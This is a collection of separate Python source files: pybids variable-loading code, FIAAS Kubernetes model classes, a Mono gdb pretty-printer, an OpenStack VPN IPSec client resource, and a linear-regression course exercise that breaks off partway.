run = dataset.create_node('run', entities, image_file=img_f,
duration=duration, repetition_time=tr)
run_info = run.get_info()
# Process event files
if events:
dfs = layout.get_nearest(
img_f, extension='.tsv', suffix='events', all_=True,
full_search=True, ignore_strict_entities=['suffix', 'extension'])
for _data in dfs:
_data = pd.read_csv(_data, sep='\t')
if 'amplitude' in _data.columns:
if (_data['amplitude'].astype(int) == 1).all() and \
'trial_type' in _data.columns:
msg = ("Column 'amplitude' with constant value 1 "
"is unnecessary in event files; ignoring it.")
_data = _data.drop('amplitude', axis=1)
else:
msg = ("Column name 'amplitude' is reserved; "
"renaming it to 'amplitude_'.")
_data = _data.rename(
columns={'amplitude': 'amplitude_'})
warnings.warn(msg)
_data = _data.replace('n/a', np.nan) # Replace BIDS' n/a
_data = _data.apply(pd.to_numeric, errors='ignore')
_cols = columns or list(set(_data.columns.tolist()) -
{'onset', 'duration'})
# Construct a DataFrame for each extra column
for col in _cols:
df = _data[['onset', 'duration']].copy()
df['amplitude'] = _data[col].values
# Add in all of the run's entities as new columns for
# index
for entity, value in entities.items():
if entity in ALL_ENTITIES:
df[entity] = value
if drop_na:
df = df.dropna(subset=['amplitude'])
if df.empty:
continue
var = SparseRunVariable(
name=col, data=df, run_info=run_info, source='events')
run.add_variable(var)
# Process confound files
if regressors:
sub_ents = {k: v for k, v in entities.items()
if k in BASE_ENTITIES}
confound_files = layout.get(suffix='regressors', scope=scope,
**sub_ents)
for cf in confound_files:
_data = pd.read_csv(cf.path, sep='\t', na_values='n/a')
if columns is not None:
conf_cols = list(set(_data.columns) & set(columns))
_data = _data.loc[:, conf_cols]
for col in _data.columns:
sr = 1. / run.repetition_time
var = DenseRunVariable(name=col, values=_data[[col]],
run_info=run_info, source='regressors',
sampling_rate=sr)
run.add_variable(var)
# Process recordinging files
rec_types = []
if physio:
rec_types.append('physio')
if stim:
rec_types.append('stim')
if rec_types:
rec_files = layout.get_nearest(
img_f, extension='.tsv.gz', all_=True, suffix=rec_types,
ignore_strict_entities=['suffix', 'extension'], full_search=True)
for rf in rec_files:
metadata = layout.get_metadata(rf)
if not metadata:
raise ValueError("No .json sidecar found for '%s'." % rf)
data = pd.read_csv(rf, sep='\t')
freq = metadata['SamplingFrequency']
st = metadata['StartTime']
rf_cols = metadata['Columns']
data.columns = rf_cols
# Filter columns if user passed names
if columns is not None:
rf_cols = list(set(rf_cols) & set(columns))
data = data.loc[:, rf_cols]
n_cols = len(rf_cols)
if not n_cols:
continue
# Keep only in-scan samples
if st < 0:
start_ind = np.floor(-st * freq)
values = data.values[start_ind:, :]
else:
values = data.values
if st > 0:
n_pad = int(freq * st)
pad = np.zeros((n_pad, n_cols))
values = np.r_[pad, values]
n_rows = int(run.duration * freq)
if len(values) > n_rows:
values = values[:n_rows, :]
elif len(values) < n_rows:
pad = np.zeros((n_rows - len(values), n_cols))
values = np.r_[values, pad]
df = pd.DataFrame(values, columns=rf_cols)
source = 'physio' if '_physio.tsv' in rf else 'stim'
for col in df.columns:
var = DenseRunVariable(name=col, values=df[[col]], run_info=run_info,
source=source, sampling_rate=freq)
run.add_variable(var)
return dataset
def _load_tsv_variables(layout, suffix, dataset=None, columns=None,
prepend_type=False, scope='all', **selectors):
"""Reads variables from scans.tsv, sessions.tsv, and participants.tsv.
Parameters
----------
layout : :obj:`bids.layout.BIDSLayout`
The BIDSLayout to use.
suffix : str
The suffix of file to read from. Must be one of 'scans',
'sessions', or 'participants'.
dataset : NodeIndex
A BIDS NodeIndex container. If None, a new one is
initialized.
columns : list
Optional list of names specifying which columns in the
files to return. If None, all columns are returned.
prepend_type : bool
If True, variable names are prepended with the
type name (e.g., 'age' becomes 'participants.age').
scope : str or list
The scope of the space to search for variables. See
docstring for BIDSLayout for details and valid predefined values.
selectors : dict
Optional keyword arguments passed onto the
BIDSLayout instance's get() method; can be used to constrain
which data are loaded.
Returns
-------
A NodeIndex instance.
"""
# Sanitize the selectors: only keep entities at current level or above
remap = {'scans': 'run', 'sessions': 'session', 'participants': 'subject'}
level = remap[suffix]
valid_entities = BASE_ENTITIES[:BASE_ENTITIES.index(level)]
layout_kwargs = {k: v for k, v in selectors.items() if k in valid_entities}
if dataset is None:
dataset = NodeIndex()
files = layout.get(extension='.tsv', suffix=suffix, scope=scope,
**layout_kwargs)
for f in files:
_data = f.get_df(include_timing=False)
# Entities can be defined either within the first column of the .tsv
# file (for entities that vary by row), or from the full file path
# (for entities constant over all rows in the file). We extract both
# and store them in the main DataFrame alongside other variables (as
# they'll be extracted when the BIDSVariable is initialized anyway).
for ent_name, ent_val in f.entities.items():
if ent_name in ALL_ENTITIES:
_data[ent_name] = ent_val
# Handling is a bit more convoluted for scans.tsv, because the first
# column contains the run filename, which we also need to parse.
if suffix == 'scans':
# Suffix is guaranteed to be present in each filename, so drop the
# constant column with value 'scans' to make way for it and prevent
# two 'suffix' columns.
_data.drop(columns=['suffix'], inplace=True)
image = _data['filename']
_data = _data.drop('filename', axis=1)
dn = f.dirname
paths = [join(dn, p) for p in image.values]
ent_recs = [dict(layout.files[p].entities) for p in paths
if p in layout.files]
ent_cols = pd.DataFrame.from_records(ent_recs)
# Remove entity columns found in both DFs
dupes = list(set(ent_cols.columns) & set(_data.columns))
to_drop = ['extension'] + dupes
ent_cols.drop(columns=to_drop, inplace=True)
_data = pd.concat([_data, ent_cols], axis=1, sort=True)
# The BIDS spec requires ID columns to be named 'session_id', 'run_id',
# etc., and IDs begin with entity prefixes (e.g., 'sub-01'). To ensure
# consistent internal handling, we strip these suffixes and prefixes.
elif suffix == 'sessions':
_data = _data.rename(columns={'session_id': 'session'})
_data['session'] = _data['session'].str.replace('ses-', '')
elif suffix == 'participants':
_data = _data.rename(columns={'participant_id': 'subject'})
_data['subject'] = _data['subject'].str.replace('sub-', '')
def make_patt(x, regex_search=False):
patt = '%s' % x
if isinstance(x, (int, float)):
# allow for leading zeros if a number was specified
# regardless of regex_search
patt = '0*' + patt
if not regex_search:
patt = '^%s$' % patt
return patt
# Filter rows on all selectors
comm_cols = list(set(_data.columns) & set(selectors.keys()))
for col in comm_cols:
ent_patts = [make_patt(x, regex_search=layout.regex_search)
for x in listify(selectors.get(col))]
patt = '|'.join(ent_patts)
_data = _data[_data[col].str.contains(patt)]
level = {'scans': 'session', 'sessions': 'subject',
'participants': 'dataset'}[suffix]
node = dataset.get_or_create_node(level, f.entities)
ent_cols = list(set(ALL_ENTITIES) & set(_data.columns))
amp_cols = list(set(_data.columns) - set(ent_cols))
if columns is not None:
amp_cols = list(set(amp_cols) & set(columns))
for col_name in amp_cols:
# Rename colummns: values must be in 'amplitude'
df = _data.loc[:, [col_name] + ent_cols]
df.columns = ['amplitude'] + ent_cols
if prepend_type:
col_name = '%s.%s' % (suffix, col_name)
node.add_variable(SimpleVariable(name=col_name, data=df, source=suffix))
return dataset
|
|
#!/usr/bin/env python
# -*- coding: utf-8
# Copyright 2017-2019 The FIAAS Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import json
import logging
from collections import namedtuple
import six
from . import config
from .client import Client, NotFound
from .fields import Field
LOG = logging.getLogger(__name__)
LOG.addHandler(logging.NullHandler())
class MetaModel(type):
"""Metaclass for Model
Responsibilities:
* Creating the _meta attribute, with url_template (if present), list of fields
and for convenience, a list of field names.
* Creates properties for name and namespace if the instance has a metadata field.
* Mixes in ApiMixIn if the Model has a Meta attribute, indicating a top level
Model (not to be confused with _meta).
"""
@staticmethod
def __new__(mcs, cls, bases, attrs):
attr_meta = attrs.pop("Meta", None)
if attr_meta:
bases += (ApiMixIn,)
meta = {
"url_template": getattr(attr_meta, "url_template", ""),
"list_url": getattr(attr_meta, "list_url", ""),
"watch_list_url": getattr(attr_meta, "watch_list_url", ""),
"watch_list_url_template": getattr(attr_meta, "watch_list_url_template", ""),
"fields": [],
"field_names": []
}
field_names = meta["field_names"]
fields = meta["fields"]
for k, v in list(attrs.items()):
if isinstance(v, Field):
if v.name == "__unset__":
v.name = k
v.attr_name = k
field_names.append(k)
fields.append(v)
Meta = namedtuple("Meta", meta.keys())
attrs["_meta"] = Meta(**meta)
return super(MetaModel, mcs).__new__(mcs, cls, bases, attrs)
class ApiMixIn(object):
"""ApiMixIn class for top level Models
Contains methods for working with the API
"""
_client = Client()
@classmethod
def _build_url(cls, **kwargs):
return cls._meta.url_template.format(**kwargs)
@classmethod
def find(cls, name="", namespace="default", labels=None):
"""Find resources using label selection
:param: :py:class:`str` name: The name of the resource, as indicated by the `app` label
:param: :py:class:`str` namespace: The namespace to search in
:param: :py:class:`dict` labels: More advanced label selection (see below)
:returns: A list of matching objects
When a `labels` dictionary is supplied, the `name` parameter is ignored.
See the docs for _label_selector for more details
"""
if namespace is None:
if not cls._meta.list_url:
raise NotImplementedError("Cannot find without namespace, no list_url defined on class {}".format(cls))
url = cls._meta.list_url
else:
url = cls._build_url(name="", namespace=namespace)
if not labels:
labels = {"app": Equality(name)}
selector = cls._label_selector(labels)
resp = cls._client.get(url, params={"labelSelector": selector})
return [cls.from_dict(item) for item in resp.json()[u"items"]]
@classmethod
def list(cls, namespace="default"):
"""List all resources in given namespace"""
if namespace is None:
if not cls._meta.list_url:
raise NotImplementedError("Cannot list without namespace, no list_url defined on class {}".format(cls))
url = cls._meta.list_url
else:
url = cls._build_url(name="", namespace=namespace)
resp = cls._client.get(url)
return [cls.from_dict(item) for item in resp.json()[u"items"]]
@classmethod
def watch_list(cls, namespace=None):
"""Return a generator that yields WatchEvents of cls"""
if namespace:
if cls._meta.watch_list_url_template:
url = cls._meta.watch_list_url_template.format(namespace=namespace)
else:
raise NotImplementedError(
"Cannot watch_list with namespace, no watch_list_url_template defined on class {}".format(cls))
else:
url = cls._meta.watch_list_url
if not url:
raise NotImplementedError("Cannot watch_list, no watch_list_url defined on class {}".format(cls))
resp = cls._client.get(url, stream=True, timeout=config.stream_timeout)
for line in resp.iter_lines(chunk_size=None):
if line:
try:
event_json = json.loads(line)
event = WatchEvent(event_json, cls)
yield event
except ValueError:
LOG.exception("Unable to parse JSON on watch event, discarding event. Line: %r", line)
@classmethod
def get(cls, name, namespace="default"):
"""Get from API server if it exists"""
url = cls._build_url(name=name, namespace=namespace)
resp = cls._client.get(url)
instance = cls.from_dict(resp.json())
return instance
@classmethod
def get_or_create(cls, **kwargs):
"""If exists, get from API, else create new instance"""
try:
metadata = kwargs.get("metadata")
instance = cls.get(metadata.name, metadata.namespace)
for field in cls._meta.fields:
field.set(instance, kwargs)
return instance
except NotFound:
return cls(new=True, **kwargs)
@classmethod
def delete(cls, name, namespace="default", **kwargs):
"""Delete the named resource"""
url = cls._build_url(name=name, namespace=namespace)
cls._client.delete(url, **kwargs)
@classmethod
def delete_list(cls, namespace="default", labels=None, delete_options=None, **kwargs):
selector = cls._label_selector(labels)
url = cls._build_url(name="", namespace=namespace)
if delete_options:
delete_options = delete_options.as_dict()
cls._client.delete(url, body=delete_options, params={"labelSelector": selector}, **kwargs)
def save(self):
"""Save to API server, either update if existing, or create if new"""
if self._new:
url = self._build_url(name="", namespace=self.metadata.namespace)
resp = self._client.post(url, self.as_dict())
self._new = False
else:
url = self._build_url(name=self.metadata.name, namespace=self.metadata.namespace)
resp = self._client.put(url, self.as_dict())
self.update_from_dict(resp.json())
@staticmethod
def _label_selector(labels):
""" Build a labelSelector string from a collection of key/values. The parameter can be either
a dict, or a list of (key, value) tuples (this allows for repeating a key).
The keys/values are used to build the `labelSelector` parameter to the API,
and supports all the operations of the API through the use of :py:class:`~k8s.base.LabelSelector`.
Each key is a label name. The value defines which operation to perform.
Operations that take a single string value:
- :py:class:`~k8s.base.Equality`
- :py:class:`~k8s.base.Inequality`
A plain string will automatically be wrapped by :py:class:`~k8s.base.Equality` for compatability
with older versions of this method.
Operations that take a sequence of string values:
- :py:class:`~k8s.base.In`
- :py:class:`~k8s.base.NotIn`
Operations that takes no value:
- :py:class:`~k8s.base.Exists`
"""
if hasattr(labels, "items"):
labels = sorted(labels.items(), key=lambda kv: kv[0])
return ",".join("{}{}".format(k, v if isinstance(v, LabelSelector) else Equality(v)) for k, v in labels)
class Model(six.with_metaclass(MetaModel)):
"""A kubernetes Model object
Contains fields for each attribute in the API specification, and methods for export/import.
"""
def __init__(self, new=True, **kwargs):
self._new = new
self._values = {}
kwarg_names = set(kwargs.keys())
for field in self._meta.fields:
kwarg_names.discard(field.name)
field.set(self, kwargs)
if field.type == SelfModel:
field.type = self.__class__
field.default_value_create_instance = False
if kwarg_names:
raise TypeError(
"{}() got unexpected keyword-arguments: {}".format(self.__class__.__name__, ", ".join(kwarg_names)))
if self._new:
self._validate_fields()
def _validate_fields(self):
for field in self._meta.fields:
if not field.is_valid(self):
raise TypeError("Value of field {} is not valid on {}".format(field.name, self))
def as_dict(self):
if all(getattr(self, field.attr_name) == field.default_value for field in self._meta.fields):
return None
d = {}
for field in self._meta.fields:
value = field.dump(self)
if value is not None:
d[_api_name(field.name)] = value
return d
def merge(self, other):
"""
`merge` sets each field in `self` to the value provided by `other`
This is mostly equivalent to just replacing `self` with `other`,
except read only fields in `self` are preserved.
"""
for field in self._meta.fields:
setattr(self, field.name, getattr(other, field.name))
update = merge # For backwards compatibility
def update_from_dict(self, d):
for field in self._meta.fields:
field.load(self, d.get(_api_name(field.name)))
self._validate_fields()
@classmethod
def from_dict(cls, d):
instance = cls(new=False)
instance.update_from_dict(d)
return instance
def __repr__(self):
return "{}({})".format(self.__class__.__name__,
", ".join("{}={}".format(key, getattr(self, key)) for key in self._meta.field_names))
def __eq__(self, other):
try:
return self.as_dict() == other.as_dict()
except AttributeError:
return False
def _api_name(name):
return name[1:] if name.startswith("_") else name
class WatchEvent(object):
ADDED = "ADDED"
MODIFIED = "MODIFIED"
DELETED = "DELETED"
def __init__(self, event_json, cls):
self.type = event_json["type"]
self.object = cls.from_dict(event_json["object"])
def __repr__(self):
return "{cls}(type={type}, object={object})".format(cls=self.__class__.__name__, type=self.type,
object=self.object)
class LabelSelector(object):
"""Base for label select operations"""
#: Operator used in selection query
operator = None
def __init__(self, value=""):
self.value = value
def __str__(self):
return "{}{}".format(self.operator, self.value)
class Equality(LabelSelector):
operator = "="
class Inequality(LabelSelector):
operator = "!="
class LabelSetSelector(LabelSelector):
def __str__(self):
return " {} ({})".format(self.operator, ",".join(self.value))
class In(LabelSetSelector):
operator = "in"
class NotIn(LabelSetSelector):
operator = "notin"
class Exists(LabelSelector):
def __init__(self):
super(Exists, self).__init__("")
def __str__(self):
return ""
class SelfModel:
"""
Use `SelfModel` as `Field.type` to set `Field.type` to the model the
`Field` was defined in during model instantiation.
This allows models to have fields with their own type.
It is not possible to reference a class in its own attributes.
Example:
```
class MyModel(Model):
submodel = Field(SelfModel) # submodel gets the type `MyModel`
```
"""
pass
|
|
#
# Author: Zoltan Varga (vargaz@gmail.com)
# License: MIT/X11
#
#
# This is a mono support mode for gdb 7.0 and later
# Usage:
# - copy/symlink this file to the directory where the mono executable lives.
# - run mono under gdb, or attach to a mono process started with --debug=gdb using gdb.
#
import os
class StringPrinter:
"Print a C# string"
def __init__(self, val):
self.val = val
def to_string(self):
if int(self.val.cast (gdb.lookup_type ("guint64"))) == 0:
return "null"
obj = self.val.cast (gdb.lookup_type ("MonoString").pointer ()).dereference ()
len = obj ['length']
chars = obj ['chars']
i = 0
res = ['"']
while i < len:
val = (chars.cast(gdb.lookup_type ("gint64")) + (i * 2)).cast(gdb.lookup_type ("gunichar2").pointer ()).dereference ()
if val >= 256:
c = "\u%X" % val
else:
c = chr (val)
res.append (c)
i = i + 1
res.append ('"')
return ''.join (res)
def stringify_class_name(ns, name):
if ns == "System":
if name == "Byte":
return "byte"
if name == "String":
return "string"
if ns == "":
return name
else:
return "%s.%s" % (ns, name)
class ArrayPrinter:
"Print a C# array"
def __init__(self, val, class_ns, class_name):
self.val = val
self.class_ns = class_ns
self.class_name = class_name
def to_string(self):
obj = self.val.cast (gdb.lookup_type ("MonoArray").pointer ()).dereference ()
length = obj ['max_length']
return "%s [%d]" % (stringify_class_name (self.class_ns, self.class_name [0:len(self.class_name) - 2]), int(length))
class ObjectPrinter:
"Print a C# object"
def __init__(self, val):
if str(val.type)[-1] == "&":
self.val = val.address.cast (gdb.lookup_type ("MonoObject").pointer ())
else:
self.val = val.cast (gdb.lookup_type ("MonoObject").pointer ())
class _iterator:
def __init__(self,obj):
self.obj = obj
self.iter = self.obj.type.fields ().__iter__ ()
pass
def __iter__(self):
return self
def next(self):
field = self.iter.next ()
try:
if str(self.obj [field.name].type) == "object":
# Avoid recursion
return (field.name, self.obj [field.name].cast (gdb.lookup_type ("void").pointer ()))
else:
return (field.name, self.obj [field.name])
except:
# Superclass
return (field.name, self.obj.cast (gdb.lookup_type ("%s" % (field.name))))
def children(self):
# FIXME: It would be easier if gdb.Value would support iteration itself
# It would also be better if we could return None
if int(self.val.cast (gdb.lookup_type ("guint64"))) == 0:
return {}.__iter__ ()
try:
obj = self.val.dereference ()
class_ns = obj ['vtable'].dereference ()['klass'].dereference ()['name_space'].string ()
class_name = obj ['vtable'].dereference ()['klass'].dereference ()['name'].string ()
if class_name [-2:len(class_name)] == "[]":
return {}.__iter__ ()
gdb_type = gdb.lookup_type ("struct %s_%s" % (class_ns.replace (".", "_"), class_name))
return self._iterator(obj.cast (gdb_type))
except:
print sys.exc_info ()[0]
print sys.exc_info ()[1]
return {}.__iter__ ()
def to_string(self):
if int(self.val.cast (gdb.lookup_type ("guint64"))) == 0:
return "null"
try:
obj = self.val.dereference ()
class_ns = obj ['vtable'].dereference ()['klass'].dereference ()['name_space'].string ()
class_name = obj ['vtable'].dereference ()['klass'].dereference ()['name'].string ()
if class_ns == "System" and class_name == "String":
return StringPrinter (self.val).to_string ()
if class_name [-2:len(class_name)] == "[]":
return ArrayPrinter (self.val,class_ns,class_name).to_string ()
if class_ns != "":
try:
gdb_type = gdb.lookup_type ("struct %s.%s" % (class_ns, class_name))
except:
# Maybe there is no debug info for that type
return "%s.%s" % (class_ns, class_name)
#return obj.cast (gdb_type)
return "%s.%s" % (class_ns, class_name)
return class_name
except:
print sys.exc_info ()[0]
print sys.exc_info ()[1]
# FIXME: This can happen because we don't have liveness information
return self.val.cast (gdb.lookup_type ("guint64"))
class MonoMethodPrinter:
"Print a MonoMethod structure"
def __init__(self, val):
self.val = val
def to_string(self):
if int(self.val.cast (gdb.lookup_type ("guint64"))) == 0:
return "0x0"
val = self.val.dereference ()
klass = val ["klass"].dereference ()
class_name = stringify_class_name (klass ["name_space"].string (), klass ["name"].string ())
return "\"%s:%s ()\"" % (class_name, val ["name"].string ())
# This returns more info but requires calling into the inferior
#return "\"%s\"" % (gdb.parse_and_eval ("mono_method_full_name (%s, 1)" % (str (int (self.val.cast (gdb.lookup_type ("guint64")))))).string ())
class MonoClassPrinter:
"Print a MonoClass structure"
def __init__(self, val):
self.val = val
def to_string(self):
if int(self.val.cast (gdb.lookup_type ("guint64"))) == 0:
return "0x0"
klass = self.val.dereference ()
class_name = stringify_class_name (klass ["name_space"].string (), klass ["name"].string ())
return "\"%s\"" % (class_name)
# This returns more info but requires calling into the inferior
#return "\"%s\"" % (gdb.parse_and_eval ("mono_type_full_name (&((MonoClass*)%s)->byval_arg)" % (str (int ((self.val).cast (gdb.lookup_type ("guint64")))))))
def lookup_pretty_printer(val):
t = str (val.type)
if t == "object":
return ObjectPrinter (val)
if t[0:5] == "class" and t[-1] == "&":
return ObjectPrinter (val)
if t == "string":
return StringPrinter (val)
if t == "MonoMethod *":
return MonoMethodPrinter (val)
if t == "MonoClass *":
return MonoClassPrinter (val)
return None
def register_csharp_printers(obj):
"Register C# pretty-printers with objfile Obj."
if obj == None:
obj = gdb
obj.pretty_printers.append (lookup_pretty_printer)
# This command will flush the debugging info collected by the runtime
class XdbCommand (gdb.Command):
def __init__ (self):
super (XdbCommand, self).__init__ ("xdb", gdb.COMMAND_NONE,
gdb.COMPLETE_COMMAND)
def invoke(self, arg, from_tty):
gdb.execute ("call mono_xdebug_flush ()")
register_csharp_printers (gdb.current_objfile())
XdbCommand ()
gdb.execute ("set environment MONO_XDEBUG gdb")
print "Mono support loaded."
|
|
# Copyright 2014-2017 by Akira Yoshiyama <akirayoshiyama@gmail.com>.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Resource class and its manager for VPN IPSec site connections in
Networking V2 API
"""
from osclient2 import base
from osclient2 import mapper
from osclient2 import utils
ATTRIBUTE_MAPPING = [
('id', 'id', mapper.Noop),
('name', 'name', mapper.Noop),
('description', 'description', mapper.Noop),
('peer_address', 'peer_address', mapper.Noop),
('peer_id', 'peer_id', mapper.Noop),
('local_ep_group_id', 'local_ep_group_id', mapper.Noop),
('peer_ep_group_id', 'peer_ep_group_id', mapper.Noop),
('peer_cidrs', 'peer_cidrs', mapper.Noop),
('route_mode', 'route_mode', mapper.Noop),
('mtu', 'mtu', mapper.Noop),
('auth_mode', 'auth_mode', mapper.Noop),
('psk', 'psk', mapper.Noop),
('initiator', 'initiator', mapper.Noop),
('ikepolicy', 'ikepolicy_id',
mapper.Resource('neutron.vpn.ikepolicy')),
('ipsecpolicy', 'ipsecpolicy_id',
mapper.Resource('neutron.vpn.ipsecpolicy')),
('vpnservice', 'vpnservice_id',
mapper.Resource('neutron.vpn.vpnservice')),
('project', 'tenant_id', mapper.Resource('project')),
('dpd', 'dpd', mapper.Noop),
('action', 'action', mapper.Noop),
('interval', 'interval', mapper.Noop),
('timeout', 'timeout', mapper.Noop),
('is_enabled', 'admin_state_up', mapper.Noop),
('status', 'status', mapper.Noop),
]
class Resource(base.Resource):
"""Resource class for VPN IPSec site connections in Networking V2 API"""
def update(self, name=None, description=None,
peer_address=None, peer_id=None,
local_ep_group_id=None, peer_ep_group_id=None,
peer_cidrs=None, mtu=None, psk=None, initiator=None,
dpd=None, action=None, interval=None, timeout=None,
is_enabled=True):
"""
Update properties of an IPSec site connection
@keyword name: IPSec site connection name
@type name: str
@keyword description: Description
@type description: str
@keyword peer_address: Peer address
@type peer_address: str
@keyword peer_id: Peer ID
@type peer_id: str
@keyword local_ep_group_id: Local EP group ID
@type local_ep_group_id: str
@keyword peer_ep_group_id: Peer EP group ID
@type peer_ep_group_id: str
@keyword peer_cidrs: Peer CIDRs
@type peer_cidrs: str
@keyword mtu: MTU
@type mtu: int
@keyword psk: PSK
@type psk: str
@keyword initiator: Initiator
@type initiator: str
@keyword dpd: DPD
@type dpd: str
@keyword action: Action
@type action: str
@keyword interval: Interval
@type interval: str
@keyword timeout: Timeout
@type timeout: int
@keyword is_enabled: Whether the connection is enabled
@type is_enabled: bool
@rtype: None
"""
return super(Resource, self).create(
name=name,
description=description,
peer_address=peer_address,
peer_id=peer_id,
local_ep_group_id=local_ep_group_id,
peer_ep_group_id=peer_ep_group_id,
peer_cidrs=peer_cidrs,
mtu=mtu,
psk=psk,
initiator=initiator,
dpd=dpd,
action=action,
interval=interval,
timeout=timeout,
is_enabled=is_enabled
)
class Manager(base.Manager):
"""Manager class for VPN IPSec site connections in Networking V2 API"""
resource_class = Resource
service_type = 'network'
_attr_mapping = ATTRIBUTE_MAPPING
_json_resource_key = 'ipsec_site_connection'
_json_resources_key = 'ipsec_site_connections'
_url_resource_path = '/v2.0/vpn/ipsec-site-connections'
def create(self, name=None, description=None, peer_address=None,
peer_id=None, local_ep_group_id=None,
peer_ep_group_id=None, peer_cidrs=None,
route_mode=None, mtu=None, auth_mode=None, psk=None,
initiator=None, ikepolicy=None, ipsecpolicy=None,
vpnservice=None, project=None, dpd=None, action=None,
interval=None, timeout=None, is_enabled=True):
"""
Create an IPSec site connection
@keyword name: IPSec site connection name
@type name: str
@keyword description: Description
@type description: str
@keyword peer_address: Peer address
@type peer_address: str
@keyword peer_id: Peer ID
@type peer_id: str
@keyword local_ep_group_id: Local EP group ID
@type local_ep_group_id: str
@keyword peer_ep_group_id: Peer EP group ID
@type peer_ep_group_id: str
@keyword peer_cidrs: Peer CIDRs
@type peer_cidrs: str
@keyword route_mode: Route mode
@type route_mode: str
@keyword mtu: MTU
@type mtu: int
@keyword auth_mode: Auth mode
@type auth_mode: str
@keyword psk: PSK
@type psk: str
@keyword initiator: Initiator
@type initiator: str
@keyword ikepolicy: IKE policy
@type ikepolicy: str
@keyword ipsecpolicy: IPSec policy
@type ipsecpolicy: str
@keyword vpnservice: VPN service
@type vpnservice: str
@keyword project: Project
@type project: osclient2.project.Resource
@keyword dpd: DPD
@type dpd: str
@keyword action: Action
@type action: str
@keyword interval: Interval
@type interval: str
@keyword timeout: Timeout
@type timeout: int
@keyword is_enabled: Whether the connection is enabled
@type is_enabled: bool
@return: Created connection
@rtype: osclient2.neutron.v2.vpn.ipsec_site_connection.Resource
"""
return super(Manager, self).create(
name=name,
description=description,
peer_address=peer_address,
peer_id=peer_id,
local_ep_group_id=local_ep_group_id,
peer_ep_group_id=peer_ep_group_id,
peer_cidrs=peer_cidrs,
route_mode=route_mode,
mtu=mtu,
auth_mode=auth_mode,
psk=psk,
initiator=initiator,
ikepolicy=ikepolicy,
ipsecpolicy=ipsecpolicy,
vpnservice=vpnservice,
project=project,
dpd=dpd,
action=action,
interval=interval,
timeout=timeout,
is_enabled=is_enabled
)
|
|
import pandas as pd
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
matplotlib.style.use('ggplot') # Look Pretty
def drawLine(model, X_test, y_test, title, R2):
# This convenience method will take care of plotting your
# test observations, comparing them to the regression line,
# and displaying the R2 coefficient
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(X_test, y_test, c='g', marker='o')
ax.plot(X_test, model.predict(X_test), color='orange', linewidth=1, alpha=0.7)
title += " R2: " + str(R2)
ax.set_title(title)
print title
print "Intercept(s): ", model.intercept_
plt.show()
def drawPlane(model, X_test, y_test, title, R2):
# This convenience method will take care of plotting your
# test observations, comparing them to the regression plane,
# and displaying the R2 coefficient
fig = plt.figure()
ax = Axes3D(fig)
ax.set_zlabel('prediction')
# You might have passed in a DataFrame, a Series (slice),
# an NDArray, or a Python List... so let's keep it simple:
X_test = np.array(X_test)
col1 = X_test[:,0]
col2 = X_test[:,1]
# Set up a Grid. We could have predicted on the actual
# col1, col2 values directly; but that would have generated
# a mesh with WAY too fine a grid, which would have detracted
# from the visualization
x_min, x_max = col1.min(), col1.max()
y_min, y_max = col2.min(), col2.max()
x = np.arange(x_min, x_max, (x_max-x_min) / 10)
y = np.arange(y_min, y_max, (y_max-y_min) / 10)
x, y = np.meshgrid(x, y)
# Predict based on possible input values that span the domain
# of the x and y inputs:
z = model.predict( np.c_[x.ravel(), y.ravel()] )
z = z.reshape(x.shape)
ax.scatter(col1, col2, y_test, c='g', marker='o')
ax.plot_wireframe(x, y, z, color='orange', alpha=0.7)
title += " R2: " + str(R2)
ax.set_title(title)
print title
print "Intercept(s): ", model.intercept_
plt.show()
#
# INFO: Let's get started!
#
# TODO: First, as is your habit, inspect your dataset in a text
# editor, or spread sheet application. The first thing you should
# notice is that the first column is both unique (the name of each)
# college, as well as unlabeled. This is a HINT that it must be the
# index column. If you do not indicate to Pandas that you already
# have an index column, it'll create one for you, which would be
# undesirable since you already have one.
#
# Review the .read_csv() documentation and discern how to load up
# a dataframe while indicating which existing column is to be taken
# as an index. Then, load up the College dataset into a variable
# called X:
#
X = pd.read_csv('Datasets/College.csv', index_col=0)
#
# INFO: This line isn't necessary for your purposes; but we'd just
# like to show you an additional way to encode features directly.
# The .map() method is like .apply(), but instead of taking in a
# lambda / function, you simply provide a mapping of keys:values.
# If you decide to embark on the "Data Scientist Challenge", this
# line of code will save you the trouble of converting it through
# other means:
X.Private = X.Private.map({'Yes':1, 'No':0})
#
# TODO: Create your linear regression model here and store it in a
# variable called 'model'. Don't actually train or do anything else
# with it yet:
#
from sklearn import linear_model
model = linear_model.LinearRegression()
#
# INFO: The first relationship we're interested in is the
# number of accepted students, as a function of the amount
# charged for room and board.
#
# TODO: Using indexing, create two slices (series). One will just
# store the room and board column, the other will store the accepted
# students column. Then use train_test_split to cut your data up
# into X_train, X_test, y_train, y_test, with a test_size of 30% and
# a random_state of 7.
#
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X[['Room.Board']], X['Accept'], test_size=0.3, random_state=7)
#
# TODO: Fit and score your model appropriately. Store the score in the
# score variable.
#
model.fit(X_train, y_train)
score = model.score(X_test, y_test)
# INFO: We'll take it from here, buddy:
drawLine(model, X_test, y_test, "Accept(Room&Board)", score)
#
# TODO: Duplicate the process above; this time, model the number of
# accepted students, as a function of the number of enrolled students
# per college.
#
X_train, X_test, y_train, y_test = train_test_split(X[['Enroll']], X['Accept'], test_size=0.3, random_state=7)
model.fit(X_train, y_train)
score = model.score(X_test, y_test)
drawLine(model, X_test, y_test, "Accept(Enroll)", score)
#
# TODO: Duplicate the process above; this time, model the number of
# accepted students, as as function of the numbr of failed undergraduate
# students per college.
#
X_train, X_test, y_train, y_test = train_test_split(X[['F.Undergrad']], X['Accept'], test_size=0.3, random_state=7)
model.fit(X_train, y_train)
